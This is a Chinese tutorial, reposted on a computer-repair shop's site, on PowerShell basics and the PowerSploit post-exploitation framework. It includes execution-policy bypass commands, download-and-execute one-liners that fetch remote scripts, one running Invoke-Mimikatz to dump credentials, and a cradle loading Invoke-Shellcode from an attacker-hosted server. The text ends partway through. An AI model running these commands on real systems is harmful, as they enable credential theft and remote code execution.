锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务,锦州广厦维修电脑,公司IT外包服务
topFlag1 设为首页
topFlag3 收藏本站
 
maojin003 首 页 公司介绍 服务项目 服务报价 维修流程 IT外包服务 服务器维护 技术文章 常见故障
锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务技术文章
[安全]解析在内网Powersploit渗透中的使用

作者: 佚名  日期:2017-04-14 07:35:07   来源: 本站整理

一.Powershell

我们先来说说powershell,PowerShell 是运行在 Windows上实现系统和应用程序管理自动化的命令行脚本环境。你可以把它看成是命令行提示符 cmd.exe 的扩充,或是颠覆。Powershell需要.NET环境的支持,同时支持.NET对象。其可读性,易用性,可以位居当前所有 shell 之首。

这是别人说的,不过稍微研究下觉得,哇塞,这东西真的挺牛的,除了语法麻烦以外,剩下都挺好,不过语法麻烦让我们这种英文不好的人怎么玩啊

当前 PowerShell 有五个版本,分别为 1.0,2.0,3.0,4.0,5.0

当时看别人的文章都说是有四个版本,但是我打开windows10看一眼,恩,微软更新了,windows10自带的5.(好几)的版本啊

先来看看他的基本命令:

 新建目录 New-Item whitecellclub -ItemType Directory

 新建文件 New-Item light.txt -ItemType File

 删除目录 Remove-Item whitecellclub

 显示文本内容 Get-Content light.txt

 设置文本内容 Set-Content light.txt -Value “i love light so much”

 追加内容 Add-Content light.txt -Value “but i love you more”

 清除内容 Clear-Content light.txt

看看吧,什么感觉,你还喜欢他么?

不过好在,微软也想到了这个问题,我们可以用windows下的命令跟Linux下的命令,比如:

这里说一下,我们怎么看我们powershell的版本,

Get-Host

这个是虚拟机的win7,所以是2.0的版本

powershell还有一些比较叼的用法:

本地权限绕过执行

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

本地隐藏权限绕过执行脚本

PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive
-NoProfile -WindowStyle Hidden(隐藏窗口) -File xxx.ps1

直接用IEX下载远程的PS1脚本回来权限绕过执行

powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-
Mimikatz -DumpCreds"

我们可以来试一下:

这个命令是可以看到我们的版本的

完美绕过!(ps:这里说一下,ps1结尾的是powershell脚本,大家可以自己去研究下,我这里就不在赘述了,因为我也不会写这种脚本)

二. Powersploit

介绍完了,我们开始我们的正题吧 Powersploit在内网渗透中的使用

powersploit一款基于powershell的后渗透(Post-Exploitation)框架,集成大量渗透相关模块和功能。

github地址: https://github.com/mattifestation/PowerSploit

这里才是重点,我们开始吧:

首先,我在我本机上下载这个脚本文件

ps:我本机用的是ubuntu,所以我这里就用ubuntu代替kali的操作

下载完成之后,我们把我们下载的文件放到apache目录小,让我们可以远程下载,然后启动apache

service apache2 start

然后我们访问我们的127.0.0.1  保证我们可以访问的到

他的目录就跟metasploit一样,分工明确

CodeExecution 在目标主机执行代码

ScriptModification 在目标主机上创建或修改脚本

Persistence 后门脚本(持久性控制)

AntivirusBypass 发现杀软查杀特征

Exfiltration 目标主机上的信息搜集工具

Mayhem 蓝屏等破坏性脚本

Recon 以目标主机为跳板进行内网信息侦查

(1). Invoke-Shellcode

我们使用 Invoke-Shellcode

Invoke-Shellcode的作用:将shellcode插入您选择的进程ID或本地PowerShell中。

Invoke-Shellcode配合上metasploit,可以达到意想不到的效果

现在主机上下载我们的脚本(当然,你也可以直接从github上去下载,也可以从我们本机下载)

IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecution/Invoke--Shellcode.ps1")


热门文章
  • 机械革命S1 PRO-02 开机不显示 黑...
  • 联想ThinkPad NM-C641上电掉电点不...
  • 三星一体激光打印机SCX-4521F维修...
  • 通过串口命令查看EMMC擦写次数和判...
  • IIS 8 开启 GZIP压缩来减少网络请求...
  • 索尼kd-49x7500e背光一半暗且闪烁 ...
  • 楼宇对讲门禁读卡异常维修,读卡芯...
  • 新款海信电视机始终停留在开机界面...
  • 常见打印机清零步骤
  • 安装驱动时提示不包含数字签名的解...
  • 共享打印机需要密码的解决方法
  • 图解Windows 7系统快速共享打印机的...
  • 锦州广厦电脑上门维修

    报修电话:13840665804  QQ:174984393 (联系人:毛先生)   
    E-Mail:174984393@qq.com
    维修中心地址:锦州广厦电脑城
    ICP备案/许可证号:辽ICP备2023002984号-1
    上门服务区域: 辽宁锦州市区
    主要业务: 修电脑,电脑修理,电脑维护,上门维修电脑,黑屏蓝屏死机故障排除,无线上网设置,IT服务外包,局域网组建,ADSL共享上网,路由器设置,数据恢复,密码破解,光盘刻录制作等服务

    技术支持:微软等